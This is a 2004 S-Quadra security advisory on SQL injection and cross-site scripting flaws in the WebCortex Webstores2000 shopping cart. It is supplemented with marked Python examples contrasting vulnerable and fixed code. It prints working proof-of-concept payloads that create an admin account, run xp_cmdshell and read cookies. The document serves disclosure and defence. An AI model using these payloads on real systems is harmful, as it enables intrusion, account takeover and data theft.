WebCortex Webstores2000 version 6.0 multiple security vulnerabilities

From: Nick Gudov (cipher_at_s-quadra.com)
Date: 02/18/04

Date: Wed, 18 Feb 2004 16:49:10 +0300
To: full-disclosure <full-disclosure@lists.netsys.com>, bugtraq <bugtraq@securityfocus.com>


              S-Quadra Advisory #2004-02-18

    Topic: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities
    Severity: High
    Vendor URL: http://www.webcortex.com
    Advisory URL: http://www.s-quadra.com/advisories/Adv-20040218.txt
    Release date: 18 Feb 2004

     1. DESCRIPTION

     Webstores2000 is a complete solution for building shopping carts and
     shopping malls for e-commerce enabled sites. It is written in ASP, runs on
     most Windows platforms and uses MS Access or MS SQL Server as a backend.
     Please visit http://www.webcortex.com for information about Webstores2000.

     2. DETAILS

      -- Vulnerability 1: SQL Injection vulnerability

     An SQL Injection vulnerability has been found in the 'browse_items.asp'
     script.

     User supplied input (the SEARCH_SKU search field posted to the script) is
     not filtered before being used in a SQL query. Consequently, the query can
     be modified with malformed input: a single quote terminates the string
     literal the value is embedded in, and the rest of the input is executed
     as SQL.

     Successful exploitation of this vulnerability could allow an attacker to
     gain administrative access to the shopping mall and to read any
     information from the database (e.g. customers' private data). With MS SQL
     Server as the backend an attacker could also execute arbitrary operating
     system commands through the xp_cmdshell extended stored procedure,
     provided the login the application connects with is allowed to run it
     (by default only members of the sysadmin role are).

      -- Vulnerability 2: Cross Site Scripting vulnerability in 'error.asp'

     The Message_id parameter of 'error.asp' is echoed into the page without
     encoding. By injecting specially crafted JavaScript code into the URL and
     tricking a user into visiting it, a remote attacker can steal the user's
     session id and gain access to the user's personal data.

     --PoC code

      --Vulnerability 1:

     Platform: MS SQL Server as a backend

     Posting this data to browse_items.asp creates a new administrative
     account (a row inserted into the Mall_Logins table):

    Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%28Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Search_Store.x=0&Search_Store.y=0

     Posting this data to browse_items.asp executes the 'dir c:' command
     through xp_cmdshell and writes its output to c:\resdirc.txt:

    Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+%27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4
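     The two POST bodies above are URL-encoded and hard to read. The following
     Python script is an added example (it is not part of the advisory and not
     WebCortex code): it decodes the SEARCH_SKU field of both proof-of-concept
     bodies and splits it at the ';' to expose the structure of the payload,
     then contrasts, against a constructed SQLite stand-in for the shop
     database, the string concatenation the advisory describes with a
     parameterised query. The query template in vulnerable_sql(), the toy
     schema and rows, and DEMO_PAYLOAD are assumptions made for the
     demonstration; the advisory does not reproduce the product's ASP source.

```python
import sqlite3
from urllib.parse import parse_qs

# The two proof-of-concept POST bodies from the advisory. They are identical up
# to the stacked statement; only the tail and the submit-button coordinates differ.
POC_PREFIX = (
    "Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU="
    "%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000"
    "+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C"
    "+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name"
    "%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku"
    "%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id"
    "%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C"
    "+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount"
    "%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date"
    "+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3B"
)
POC_ADMIN = POC_PREFIX + (
    "insert+into+Mall_Logins+%28Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--"
    "&Search_Store.x=0&Search_Store.y=0"
)
POC_CMDSHELL = POC_PREFIX + (
    "exec+master..xp_cmdshell+%27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--"
    "&Search_Store.x=39&Search_Store.y=4"
)


def injected_sku(body):
    """Decode the SEARCH_SKU field of a browse_items.asp POST body."""
    return parse_qs(body, keep_blank_values=True)["SEARCH_SKU"][0]


def stacked_statements(sku):
    """Split the decoded value at ';': [tail of the original query, stacked statement]."""
    return [part.strip() for part in sku.split(";")]


# Constructed stand-in for the shop database (assumption: toy schema and rows for
# two of the tables named in the PoC; the real schema is not in the advisory).
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE Store_Items (Item_Sku TEXT, Show INTEGER);"
        "CREATE TABLE Mall_Logins (Mall_User_Id INTEGER, Mall_Password INTEGER);"
        "INSERT INTO Store_Items VALUES ('SKU-100', 1);"
        "INSERT INTO Store_Items VALUES ('SKU-200', 0);"
    )
    return conn


# Same shape as the advisory's payload, shortened to fit the toy schema: close the
# string literal, keep the first statement valid, stack an INSERT, comment out the
# text the application appends after the value.
DEMO_PAYLOAD = (
    "%' AND Show <> 0;"
    "insert into Mall_Logins (Mall_User_Id, Mall_Password) values (1,2)--"
)


def vulnerable_sql(sku):
    """Hypothetical reconstruction of the concatenation the advisory describes
    (the product's ASP source is not reproduced there)."""
    return "SELECT Item_Sku FROM Store_Items WHERE Item_Sku LIKE '%" + sku + "%'"


def search_vulnerable(conn, sku):
    """Execute the concatenated text as a batch. ADO against SQL Server runs every
    statement in the string; sqlite3 accepts one statement per execute(), so the
    batch is emulated by splitting on ';'."""
    rows = []
    for statement in vulnerable_sql(sku).split(";"):
        rows.extend(r[0] for r in conn.execute(statement))
    return rows


def search_safe(conn, sku):
    """Parameterised form: the whole SKU value is data, quotes and ';' included."""
    query = "SELECT Item_Sku FROM Store_Items WHERE Item_Sku LIKE '%' || ? || '%'"
    return [r[0] for r in conn.execute(query, (sku,))]


def mall_logins(conn):
    return conn.execute("SELECT Mall_User_Id, Mall_Password FROM Mall_Logins").fetchall()


if __name__ == "__main__":
    for name, body in (("admin", POC_ADMIN), ("xp_cmdshell", POC_CMDSHELL)):
        first, stacked = stacked_statements(injected_sku(body))
        print(name, "stacked statement:", stacked)
    conn = build_demo_db()
    print("vulnerable:", search_vulnerable(conn, DEMO_PAYLOAD), mall_logins(conn))
    conn = build_demo_db()
    print("parameterised:", search_safe(conn, DEMO_PAYLOAD), mall_logins(conn))
```

     Note how the payload does not merely break the query: it re-supplies the
     rest of the original statement (the Store_id filters, the GROUP BY and
     the ORDER BY clauses) so that the first statement stays valid, then
     stacks the INSERT or the EXEC after the ';' and comments out whatever
     the script appends with '--'. The stacked-statement form depends on a
     backend and driver that execute several statements in one call, which
     MS SQL Server through ADO does. With the parameterised query the entire
     value is treated as data and the INSERT never runs.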

      -- Vulnerability 2:

     http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>
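     The following Python snippet is an added example, not code from the
     advisory or from WebCortex: it extracts Message_id from the
     proof-of-concept URL above and renders it first the way the advisory
     describes error.asp doing (verbatim), then HTML-encoded, the equivalent
     of Server.HTMLEncode in classic ASP. The page template is an assumption
     made for the demonstration.

```python
import html
from urllib.parse import parse_qs

# Proof-of-concept URL from the advisory.
POC_URL = "http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>"

# Constructed stand-in for the error page (assumption: the advisory does not
# reproduce error.asp; what matters here is only where the value lands).
TEMPLATE = "<html><body><p>Error: message {msg} could not be found.</p></body></html>"


def message_id_from_url(url):
    """Pull Message_id out of the query string, as error.asp would via Request.QueryString."""
    query = url.split("?", 1)[1]
    return parse_qs(query, keep_blank_values=True)["Message_id"][0]


def render_vulnerable(message_id):
    """Echo the parameter verbatim: the behaviour the advisory describes."""
    return TEMPLATE.format(msg=message_id)


def render_safe(message_id):
    """HTML-encode the parameter first (Server.HTMLEncode in classic ASP)."""
    return TEMPLATE.format(msg=html.escape(message_id, quote=True))


def contains_script_tag(page):
    """Crude check used only to compare the two renderings."""
    return "<script" in page.lower()


if __name__ == "__main__":
    mid = message_id_from_url(POC_URL)
    print(render_vulnerable(mid))
    print(render_safe(mid))
```

     The proof of concept reads document.cookie; script injected this way
     cannot read a session cookie the server set with the HttpOnly attribute,
     which limits the session-theft outcome described above, but the script
     still runs in the user's session, so output encoding remains the actual
     fix.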
     
     3. FIX INFORMATION

     S-Quadra alerted the WebCortex development team to these issues on 13
     February 2004. The following response from Shay Sabah has been received:
    "OK... All of these have been fixed...
    Now, I ask you to please STOP using our software and making all these
    "security" emails..."
     
     4. CREDITS

     Nick Gudov <cipher@s-quadra.com> is responsible for discovering these issues.

     5. ABOUT

     S-Quadra offers services in computer security: penetration testing and
     network assessment, web application security, source code review, third
     party product vulnerability assessment, forensic support and reverse
     engineering.

               S-Quadra Advisory #2004-02-18

